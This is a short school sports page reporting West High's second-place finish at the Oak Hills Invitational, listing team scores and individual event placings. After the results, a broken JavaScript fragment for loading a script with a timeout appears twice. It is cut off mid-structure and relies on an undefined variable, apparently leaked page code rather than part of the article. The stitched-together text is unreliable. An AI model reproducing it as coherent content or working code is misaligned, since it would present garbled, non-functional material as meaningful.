Gymnastics

West Gymnastics places 2nd at Oak Hills Invitational!

Event:
Oak Hills Invitational at Cincinnati Gymnastics Academy

9 Teams Competing:
1. Miamisburg  134.95
2. West  131.625
3. Turpin 121.6
4. …

West High Event Scorers:
Vault — Ramiah Curry- 8.675, 3rd
Bars — Madlyn Power- 8.675, 3rd
Beam — Ramiah Curry- 8.725, 3rd
Floor — Madlyn Power- 8.875, 5th
AA — Ramiah Curry- 33.625, 5th

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts